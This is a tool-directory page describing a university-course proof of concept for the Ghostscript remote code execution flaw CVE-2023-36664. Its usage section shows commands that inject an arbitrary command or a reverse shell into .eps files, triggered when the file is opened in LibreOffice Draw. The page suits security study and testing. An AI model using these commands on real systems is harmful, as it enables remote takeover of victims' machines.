Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-36664 — Python PoC for CVE-2023-36664 Ghostscript RCE. Injects payloads or reverse shells into .eps files to trigger code execution via LibreOffice Draw. | Kitploit
Tools/GitHubGitHub/jeanchpt/cve-2023-36664
Payload GenerationVulnerability AnalysisExploitationPenetration TestingLearning & Education
GitHubjeanchpt/cve-2023-36664

CVE-2023-36664

Python PoC for CVE-2023-36664 Ghostscript RCE. Injects payloads or reverse shells into .eps files to trigger code execution via LibreOffice Draw.

View Repository
102 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-36664 : Ghostscript remote code execution

Proof of concept for the CVE-2023-36664.

Usage

To insert a payload into a .eps file :

python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox

To insert a reverse shell payload into a .eps file :

python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234

The opening of the injected file in Libreoffice Draw should trigger the payload.

Disclaimer

This proof of concept was developed for a specific course at university. It is published here only for pedagogical usage.

Download Tool